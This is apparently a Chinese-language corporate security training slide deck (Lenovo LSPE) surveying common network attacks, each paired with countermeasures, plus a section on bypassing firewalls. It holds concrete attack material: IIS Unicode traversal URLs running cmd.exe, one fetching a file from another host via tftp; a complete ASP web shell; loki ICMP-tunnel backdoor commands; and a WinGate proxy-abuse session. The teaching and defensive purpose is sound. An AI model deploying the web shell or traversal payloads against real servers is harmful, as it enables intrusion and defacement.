联想信息安全 LSPE 认证培训

联想信息安全联想信息安全 LSPE LSPE 认证培训认证培训

网络攻击与防范培训教材网络攻击与防范培训教材

22

预攻击探测收集信息 ,如 OS类型 ,提供的服务端口发现漏洞 , 采取攻击行为

获得攻击目标的控制权系统

继续渗透网络 , 直至获取机密数据消灭踪迹

破解口令文件 ,或利用缓存溢出漏洞

以此主机为跳板，寻找其它主机的漏洞

典型的攻击步骤

获得系统帐号权限，并提升为 root权限安装系统后门方便以后使用

消除所有入侵脚印，以免被管理员发觉

33

预攻击探测•Ping sweep寻找存活主机•Port scan

寻找存活主机的开放服务（端口）•OS fingerprint操作系统识别

44

端口扫描

55

针对预攻击探测的防范措施•Ping sweep

安装防火墙，禁止 ICMP ping ，使用 NAT 隐藏内部网络结构•Port scan

安装防火墙，禁止访问不该访问的服务端口•OS fingerprint

安装防火墙，只允许访问少量服务端口，由于攻击者缺乏必要的信息，无法判断 OS 类型

66

漏洞扫描

77

攻击手法 vs. 入侵者技术高

低

1980 1985 1990 1995 2000

密码猜测可自动复制的代码破解密码利用已知的漏洞

破坏审计系统后门会话劫持

消除痕迹嗅探

IP 欺骗

GUI 远程控制自动探测扫描

拒绝服务www 攻击

攻击手法与工具

入侵者技术

半开隐蔽扫描

控制台入侵检测网络管理

DDOS 攻击

88

漏洞利用周期图表入侵者着眼新的漏洞

自动扫描安全漏洞工具发布

自动扫描安全漏洞工具广泛流传

入侵者采用公布的攻击代码简陋的漏洞攻击代码发布

资深黑客发现漏洞

99

针对漏洞扫描的防范措施•安装防火墙，禁止访问不该访问的服务端口，使用NAT隐藏内部网络结构•安装入侵检测系统，检测漏洞扫描行为•安装安全评估系统，先于入侵者进行漏洞扫描，以便及早发现问题并解决•提高安全意识，经常给操作系统和应用软件打补丁

1010

一、基于口令的攻击二、网络嗅探攻击三、木马与后门攻击四、利用漏洞攻击五、拒绝服务攻击六、分布式拒绝服务攻击七、 ARP 欺骗攻击八、 IP 欺骗攻击九、病毒蠕虫攻击十、社交工程攻击

1111


1212

•暴力穷举完全取决于机器的运算速度

•字典破解大大减少运算的次数，提高成功率

1313

1414

针对口令破解攻击的防范措施•安装入侵检测系统，检测口令破解行为•安装安全评估系统，先于入侵者进行模拟口令破解，以便及早发现弱口令并解决•提高安全意识，避免弱口令

1515


1616

　　网络嗅探是主机的一种工作模式，在这种模式下，主机可以接收到共享式网段在同一条物理通道上传输的所有信息，而不管这些信息的发送方和接受方是谁。此时，如果两台主机进行通信的信息没有加密，只要使用某些网络监听工具，例如NetXray ， tcpdump ， Dsniff等就可以轻而易举地截取包括口令、帐号等敏感信息。

1717

网上截获的帐号和口令

1818

网上截获的帐号和口令

1919

针对网络嗅探攻击的防范措施•安装 VPN网关，防止对网间网信道进行嗅探•对内部网络通信采取加密处理•采用交换设备进行网络分段•采取技术手段发现处于混杂模式的主机，发掘“鼹鼠”

2020


2121

特洛伊木马程序可以直接侵入用户的电脑并进行破坏，它常被伪装成工具程序或者游戏等诱使用户打开带有木马程序的邮件附件或从网上直接下载，一旦用户打开了这些邮件的附件或者执行了这些程序之后，它们就会在计算机系统中隐藏一个可以在启动时悄悄执行的程序。这种远程控制工具可以完全控制受害主机，危害极大。Windows 下：Netbus 、 subseven 、 BO 、冰河、网络神偷等UNIX 下：Rhost ++ 、 Login 后门、 rootkit 等

2222

2323

针对木马攻击的防范措施•安装防火墙，禁止访问不该访问的服务端口，使用NAT隐藏内部网络结构•安装防病毒软件•提高安全意识，尽量避免使用来历不明的软件

2424


2525

2626

http://10.1.5.10/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir

2727

http://10.1.5.10/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp+10.1.5.81+get+index.html+g:\inetpub\wwwroot\guanli\index.htm

2828

2929


3030

IGMP-NUKE 攻击

3131

针对拒绝服务攻击的防范措施•安装防火墙，禁止访问不该访问的服务端口，过滤不正常的畸形数据包，使用 NAT隐藏内部网络结构•安装入侵检测系统，检测拒绝服务攻击行为•安装安全评估系统，先于入侵者进行模拟攻击，以便及早发现问题并解决•提高安全意识，经常给操作系统和应用软件打补丁

3232


3333

分布式拒绝服务攻击（ DDoS ） DDoS 攻击由三部分组成

客户端程序（黑客主机）控制点（ Master ）代理程序（ Zombie ），或者称为攻击点

（ daemon ）

3434

DDoS攻击的第一步

扫描程序

未受保护的计算机Hacker

黑客扫描 Internet 寻找安全性差的计算机1

Internet

3535

DDoS攻击的第二步Hacker

Zombies

黑客秘密地安装 zombie 代理程序，将那些未受保护的计算机变成攻击点，这些沦为黑客帮凶的计算机称为zombies

2

Internet

3636

DDoS攻击的第三步

黑客选择一台 Master Server 用来发送命令给 zombies

3

ZombiesMasterServer

Internet

Hacker

3737

DDoS攻击的第四步

黑客使用客户端程序给 Master Server 发送进攻命令4

Zombies

目标系统

MasterServer

Internet

Hacker

3838

DDoS攻击的第五步

目标系统

Master Server 向zombies 发送信号，让这些受控的攻击点 zombies 一起向目标系统发起攻击

5

MasterServer

Internet

ZombiesHacker

3939

DDoS攻击的第六步

目标系统

Hacker

目标系统被大量的假请求淹没，被迫关闭6

MasterServer

用户请求被拒绝

Internet

Zombies

4040

Master Master Master

Flooding Flooding Flooding Flooding Flooding Flooding

YahooYahoo 受攻击过程受攻击过程

攻击目标

攻击者

Master Master Master

4141

针对 DDoS 攻击的防范措施•安装防火墙，禁止访问不该访问的服务端口，过滤不正常的畸形数据包，使用 NAT隐藏内部网络结构•安装入侵检测系统，检测 DDoS攻击通信•提高安全意识，经常给操作系统和应用软件打补丁

4242


4343

A BHacker当 A 与 B 需要通讯时： A 发送 ARP Request询问 B 的 MAC 地址 B 发送 ARP Reply告诉A 自己的 MAC 地址

4444

Hacker 发送伪装的 ARP Reply告诉 A ，计算机 B 的 MAC 地址是Hacker 计算机的 MAC地址。 Hacker 发送伪装的 ARP Reply告诉 B ，计算机 A 的 MAC 地址是Hacker 计算机的 MAC地址。这样A 与 B 之间的通讯都将先经过Hacker ，然后由 Hacker 进行转发。于是Hacker 可以捕获到所有 A 与 B 之间的数据传输（如用户名和密码）。这是一种典型的中间人攻击方法。

Meet-in-Middle:

4545

针对 ARP 欺骗攻击的防范措施•安装入侵检测系统，检测 ARP欺骗攻击•MAC地址与 IP地址绑定

4646


4747

A

B

Z

互相信任DoS 攻击

探测 ISN规律SYN (我是 B ，可以连接吗？ )

SYN|ACK

ACK (我是 B ，确认连接 )

4848

针对 IP 欺骗攻击的防范措施•安装 VPN网关，实现加密和身份认证•实施 PKI CA, 实现身份认证•通信加密

4949


5050

针对病毒蠕虫攻击的防范措施•安装防火墙，禁止访问不该访问的服务端口•安装入侵检测系统，检测病毒蠕虫攻击•安装防病毒软件，阻挡病毒蠕虫的侵袭•提高安全意识，经常给操作系统和应用软件打补丁

5151


5252

这种攻击属于非技术类攻击。入侵者给用户打电话或者发送 E-mail 告诉用户自己是系统管理员，这就是所谓的社交工程攻击的一个典型例子。通常，入侵者会要求用户告诉他口令或其他重要信息。

social engineering attack

5353

一、基于口令的攻击 (IDS 、 OS 、 scanner)二、网络嗅探攻击 (VPN、加密技术、网络分段)三、木马与后门攻击 ( 防火墙、防病毒 )四、利用漏洞攻击 ( 防火墙、 IDS 、 scanner 、 OS)五、拒绝服务攻击 ( 防火墙、 IDS 、 OS)六、分布式拒绝服务攻击 ( 防火墙、 IDS 、 OS)七、 ARP 欺骗攻击 (IDS 、 MAC 地址绑定 )八、 IP 欺骗攻击 (VPN、加密技术、身份认证 ) 九、病毒蠕虫攻击 ( 防火墙、 IDS 、防病毒 )十、社交工程攻击 ( 安全意识、管理手段 )

攻击防范对策总结

5454

一 . 黑客常用的一些攻击手段及防范措施二 .分析攻击过程三 . 攻击事例及代码四 .总结

5555

利用 ASP 服务攻击的漏洞描述及解决方法请先看如下的代码：<%@ Language=VBScript %>%Dim oScriptDim oScriptNetDim oFileSys, oFileDim szCMD, szTempFileOn Error Resume Next' -- create the COM objects that we will be using -- 'Set oScript = Server.CreateObject("WSCRIPT.SHELL")Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

' -- check for a command that we have posted -- 'szCMD = Request.Form(".CMD")If (szCMD <> "") Then

5656

' -- Use a poor man's pipe ... a temp file -- 'szTempFile = "C:\" & oFileSys.GetTempName( )Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)End If%><HTML><BODY><FORM action=”<%= Request.ServerVariables("URL") %>" method="POST"><input type=text name=".CMD" size=45 value=""><input type=submit value="Run"></FORM><PRE>

5757

<%If (IsObject(oFile)) Then' -- Read the output from our command and remove the temp file -- 'On Error Resume NextResponse.Write Server.HTMLEncode(oFile.ReadAll)oFile.CloseCall oFileSys.DeleteFile(szTempFile, True)End If%></BODY></HTML>

5858

漏洞描述：　　你只要把它保存为 *.asp放到一个支持 asp的空间里，然后打开浏览器 http://***.***.***/*.asp 就可以一目了然了。可以使用 dos 命令对服务器进行任何操作。这种情况可以发生在一个攻击者拥有目标 NT服务器上的一个可写目录帐号，并且这个目录又支持 ASP。比如一些支持 ASP的个人主页服务器，把这个文件先传上你申请的主页空间，然后再浏览器里打开此页面直接使用 dos命令。这样攻击者就能任意修改，执行目标服务器上的文件，不管他对这个文件有无读写访问权。　　所以那些提供有 ASP服务的个人主页或者其它服务的服务器，就要加倍小心这种攻击了。解决方法：　　其实它就是利用了上面讲的 filesystemobject 组件篡改下载 fat 分区上的任何文件的漏洞。那么我们如何才能限制用户使用 FileSystemObject对象呢？一种下下的方法是完全反注册掉提供FileSystemObject对象的那个组件，也就是 Scrrun.dll。具体的方法如下：　　在ＭＳ－ＤＯＳ状态下面键入： Regsvr32 /u \%winnt%\system\scrrun.dll 但是这样的话，就不能使用 FileSystemObject对象了，有时利用 FileSystemObject对象来管理文件是很方便，有什么办法能两全其美呢？　　我们可以做到禁止他人非法使用 FileSystemObject对象 ,但是我们自己仍然可以使用这个对象。　　方法如下：　　查找注册表中 HKEY_CLASSES_ROOT\Scripting.FileSystemObject 键值将其更改成为你想要的字符串 ( 右键 -->" 重命名 "),比如更改成为HKEY_CLASSES_ROOT\Scripting.FileSystemObjectx 这样 ,在 ASP就必须这样引用这个对象了 : Set fso = CreateObject("Scripting.FileSystemObjectx") 而不能使用：Set fso = CreateObject("Scripting.FileSystemObject") 如果再有人使用通常的方法来调用 FileSystemObject对象就会无法使用了。当然除此之外我们还可以使用第三方的软件来解决这个问题！在此不再赘述。

5959

一防火墙基本原理首先，我们需要了解一些基本的防火墙实现原理。防火墙目前主要分包过滤，和状态检测的包过滤，应用层代理防火墙。但是他们的基本实现都是类似的。 | |--- 路由器 -----网卡 |防火墙 |网卡 |----------内部网络 | | 防火墙一般有两个以上的网络卡，一个连到外部（ router)，另一个是连到内部网络。当打开主机网络转发功能时，两个网卡间的网络通讯能直接通过。当有防火墙时，他好比插在网卡之间，对所有的网络通讯进行控制。说到访问控制，这是防火墙的核心了，防火墙主要通过一个访问控制表来判断的，他的形式一般是一连串的如下规则： 1 accept from+ 源地址，端口 to+ 目的地址，端口 + 采取的动作 2 deny ...........（ deny就是拒绝。。 ) 3 nat ............(nat是地址转换。后面说）防火墙在网络层（包括以下的链路层）接受到网络数据包后，就从上面的规则连表一条一条地匹配，如果符合就执行预先安排的动作了！如丢弃包。。。。但是，不同的防火墙，在判断攻击行为时，有实现上的差别。下面结合实现原理说说可能的攻击。

6060

二攻击包过滤防火墙包过滤防火墙是最简单的一种了，它在网络层截获网络数据包，根据防火墙的规则表，来检测攻击行为。他根据数据包的源 IP地址；目的 IP地址； TCP/UDP 源端口； TCP/UDP目的端口来过滤！！很容易受到如下攻击： 1 ip 欺骗攻击：这种攻击，主要是修改数据包的源，目的地址和端口，模仿一些合法的数据包来骗过防火墙的检测。如：外部攻击者，将他的数据报源地址改为内部网络地址，防火墙看到是合法地址就放行了。可是，如果防火墙能结合接口，地址来匹配，这种攻击就不能成功了 . 2 d.o.s拒绝服务攻击简单的包过滤防火墙不能跟踪 tcp的状态，很容易受到拒绝服务攻击，一旦防火墙受到 d.o.s攻击，他可能会忙于处理，而忘记了他自己的过滤功能。：）你就可以饶过了，不过这样攻击还很少的。！ 3 分片攻击这种攻击的原理是：在 IP的分片包中，所有的分片包用一个分片偏移字段标志分片包的顺序，但是，只有第一个分片包含有 TCP端口号的信息。当 IP分片包通过分组过滤防火墙时，防火墙只根据第一个分片包的 Tcp信息判断是否允许通过，而其他后续的分片不作防火墙检测，直接让它们通过。这样，攻击者就可以通过先发送第一个合法的 IP分片，骗过防火墙的检测，接着封装了恶意数据的后续分片包就可以直接穿透防火墙，直接到达内部网络主机，从而威胁网络和主机的安全。

6161

4 木马攻击对于包过滤防火墙最有效的攻击就是木马了，一但你在内部网络安装了木马，防火墙基本上是无能为力的。原因是：包过滤防火墙一般只过滤低端口（ 1-1024），而高端口他不可能过滤的（因为，一些服务要用到高端口，因此防火墙不能关闭高端口的），所以很多的木马都在高端口打开等待，如冰河， subseven等。。。但是木马攻击的前提是必须先上传，运行木马，对于简单的包过滤防火墙来说，是容易做的。这里不写这个了。大概就是利用内部网络主机开放的服务漏洞。早期的防火墙都是这种简单的包过滤型的，到现在已很少了，不过也有。现在的包过滤采用的是状态检测技术，下面谈谈状态检测的包过滤防火墙。三攻击状态检测的包过滤状态检测技术最早是 checkpoint提出的，在国内的许多防火墙都声称实现了状态检测技术。可是很多是没有实现的。到底什么是状态检测？一句话，状态检测就是从 tcp 连接的建立到终止都跟踪检测的技术。原先的包过滤，是拿一个一个单独的数据包来匹配规则的。可是我们知道，同一个 tcp连接，他的数据包是前后关联的，先是 syn包， -》数据包 = 》 fin包。数据包的前后序列号是相关的。

6262

如果割裂这些关系，单独的过滤数据包，很容易被精心够造的攻击数据包欺骗！！！如 nmap的攻击扫描，就有利用 syn包， fin包， reset包来探测防火墙后面的网络。！相反，一个完全的状态检测防火墙，他在发起连接就判断，如果符合规则，就在内存登记了这个连接的状态信息（地址， port，选项。。） ,后续的属于同一个连接的数据包，就不需要在检测了。直接通过。而一些精心够造的攻击数据包由于没有在内存登记相应的状态信息，都被丢弃了。这样这些攻击数据包，就不能饶过防火墙了。说状态检测必须提到动态规则技术。在状态检测里，采用动态规则技术，原先高端口的问题就可以解决了。实现原理是：平时，防火墙可以过滤内部网络的所有端口(1-65535),外部攻击者难于发现入侵的切入点，可是为了不影响正常的服务，防火墙一但检测到服务必须开放高端口时，如（ ftp协议， irc等），防火墙在内存就可以动态地天加一条规则打开相关的高端口。等服务完成后，这条规则就又被防火墙删除。这样，既保障了安全，又不影响正常服务，速度也快。！一般来说，完全实现了状态检测技术防火墙，智能性都比较高，一些扫描攻击还能自动的反应，因此，攻击者要很小心才不会被发现。但是，也有不少的攻击手段对付这种防火墙的。 1 协议隧道攻击协议隧道的攻击思想类似与 VPN的实现原理，攻击者将一些恶意的攻击数据包隐藏在一些协议分组的头部，从而穿透防火墙系统对内部网络进行攻击。

6363

例如，许多简单地允许 ICMP回射请求、 ICMP回射应答和 UDP分组通过的防火墙就容易受到 ICMP和 UDP协议隧道的攻击。 Loki和 lokid（攻击的客户端和服务端）是实施这种攻击的有效的工具。在实际攻击中，攻击者首先必须设法在内部网络的一个系统上安装上 lokid服务端，而后攻击者就可以通过 loki客户端将希望远程执行的攻击命令（对应 IP分组）嵌入在 ICMP或 UDP包头部，再发送给内部网络服务端 lokid，由它执行其中的命令，并以同样的方式返回结果。由于许多防火墙允许 ICMP和 UDP分组自由出入，因此攻击者的恶意数据就能附带在正常的分组，绕过防火墙的认证，顺利地到达攻击目标主机下面的命令是用于启动 lokid服务器程序： lokid-p–I–vl loki客户程序则如下启动： loki–d172.29.11.191(攻击目标主机 )-p–I–v1–t3 这样， lokid和 loki就联合提供了一个穿透防火墙系统访问目标系统的一个后门。

6464

2 利用 FTP-pasv 绕过防火墙认证的攻击 FTP-pasv攻击是针对防火墙实施入侵的重要手段之一。目前很多防火墙不能过滤这种攻击手段。如 CheckPoint的 Firewall-1，在监视 FTP服务器发送给客户端的包的过程中，它在每个包中寻找 "227"这个字符串。如果发现这种包，将从中提取目标地址和端口，并对目标地址加以验证，通过后，将允许建立到该地址的 TCP 连接。攻击者通过这个特性，可以设法连接受防火墙保护的服务器和服务。 3 反弹木马攻击反弹木马是对付这种防火墙的最有效的方法。攻击者在内部网络的反弹木马定时地连接外部攻击者控制的主机，由于连接是从内部发起的，防火墙（任何的防火墙）都认为是一个合法的连接，因此基本上防火墙的盲区就是这里了。防火墙不能区分木马的连接和合法的连接。但是这种攻击的局限是：必须首先安装这个木马！！！所有的木马的第一步都是关键！！！

6565

四攻击代理代理是运行在应用层的防火墙，他实质是启动两个连接，一个是客户到代理，另一个是代理到目的服务器。实现上比较简单，和前面的一样也是根据规则过滤。由于运行在应用层速度比较慢 . 攻击代理的方法很多。这里就以 wingate为例，简单说说了。 WinGate是目前应用非常广泛的一种Windows95/NT 代理防火墙软件，内部用户可以通过一台安装有WinGate的主机访问外部网络，但是它也存在着几个安全脆弱点。黑客经常利用这些安全漏洞获得WinGate的非授权Web、 Socks和 Telnet的访问，从而伪装成WinGate主机的身份对下一个攻击目标发动攻击。因此，这种攻击非常难于被跟踪和记录。导致WinGate安全漏洞的原因大多数是管理员没有根据网络的实际情况对WinGate代理防火墙软件进行合理的设置，只是简单地从缺省设置安装完毕后就让软件运行，这就给攻击者可乘之机。 1 非授权Web访问某些WinGate版本（如运行在 NT系统下的 2.1d版本）在误配置情况下，允许外部主机完全匿名地访问因特网。因此，外部攻击者就可以利用WinGate主机来对Web服务器发动各种Web攻击（如 CGI的漏洞攻击等），同时由于Web攻击的所有报文都是从 80号 Tcp端口穿过的，因此，很难追踪到攻击者的来源。

6666

检测检测WinGate主机是否有这种安全漏洞的方法如下： 1) 以一个不会被过滤掉的连接（譬如说拨号连接）连接到因特网上。 2) 把浏览器的代理服务器地址指向待测试的WinGate主机。如果浏览器能访问到因特网，则WinGate主机存在着非授权Web访问漏洞。 2 非授权 Socks访问在WinGate的缺省配置中， Socks 代理（ 1080号 Tcp端口）同样是存在安全漏洞。与打开的Web代理（ 80号 Tcp端口）一样，外部攻击者可以利用 Socks 代理访问因特网。防范要防止攻击WinGate的这个安全脆弱点，管理员可以限制特定服务的捆绑。在多宿主（multihomed）系统上，执行以下步骤以限定如何提供代理服务。 1选择Socks或WWWProxyServer 属性。 2选择Bindings标签。 3按下 ConnectionsWillBeAcceptedOnTheFollowingInterfaceOnly按钮，并指定本WinGate服务器的内部接口。非授权 Telnet访问它是WinGate 最具威胁的安全漏洞。通过连接到一个误配置的WinGate服务器的 Telnet服务，攻击者可以使用别人的主机隐藏自己的踪迹，随意地发动攻击。

6767

检测检测WinGate主机是否有这种安全漏洞的方法如下： 1使用 telnet尝试连接到一台WinGate服务器。 [root@happy/tmp]#telnet172.29.11.191 Trying172.29.11.191…. Connectedto172.29.11.191. Escapecharacteris‘^]’. Wingate>10.50.21.5 2如果接受到如上的响应文本，那就输入待连接到的网站。 3如果看到了该新系统的登录提示符，那么该服务器是脆弱的。 Connectedtohost10.50.21.5…Connected SunOS5.6 Login:

6868

对策防止这种安全脆弱点的方法和防止非授权 Socks访问的方法类似。在WinGate 中简单地限制特定服务的捆绑就可以解决这个问题。一般来说，在多宿主（multihomed）系统管理员可以通过执行以下步骤来完成： 1选择 TelnetSever 属性。 2选择Bindings标签。 3按下 ConnectionsWillBeAcceptedOnTheFollowingInterfaceOnly按钮，并指定本WinGate服务器的内部接口。五后话有防火墙的攻击不单是上面的一点，我有什么写的不对的，大家指正。一直以来，黑客都在研究攻击防火墙的技术和手段，攻击的手法和技术越来越智能化和多样化。但是就黑客攻击防火墙的过程上看，大概可以分为三类攻击。第一类攻击防火墙的方法是探测在目标网络上安装的是何种防火墙系统并且找出此防火墙系统允许哪些服务。我们叫它为对防火墙的探测攻击。第二类攻击防火墙的方法是采取地址欺骗、 TCP序号攻击等手法绕过防火墙的认证机制，从而对防火墙和内部网络破坏。第三类攻击防火墙的方法是寻找、利用防火墙系统实现和设计上的安全漏洞，从而有针对性地发动攻击。这种攻击难度比较大，可是破坏性很大。

6969

联想信息安全 LSPE 认证培训

Documents